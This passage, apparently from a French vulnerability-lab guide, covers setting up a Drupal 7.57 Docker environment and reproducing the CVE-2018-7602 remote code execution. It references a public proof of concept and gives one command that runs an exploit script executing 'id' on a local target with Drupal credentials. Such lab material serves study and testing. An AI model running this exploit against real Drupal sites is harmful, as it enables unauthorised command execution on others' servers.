
# dans l'URL pour contourner le filtrage de la fonction sanitize()Exécutez la commande suivante pour lancer l'environnement Drupal 7.57 :
docker-compose up -d
Une fois l'environnement démarré, accédez à http://your-ip:8081/ pour voir la page d'installation de Drupal. Suivez la configuration par défaut en cliquant sur "Suivant". Comme il n'y a pas d'environnement MySQL, vous pouvez choisir la base de données SQLite lors de l'installation.
Référez-vous au PoC de pimps/CVE-2018-7600.
Comme illustré ci-dessous, exécutez la commande suivante pour reproduire la vulnérabilité. La commande d'exemple est id, comme indiqué dans le cadre rouge, elle peut être exécutée.
# "id" est la commande à exécuter, le premier "drupal" est le nom d'utilisateur, le second "drupal" est le mot de passe
python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://127.0.0.1:8081/
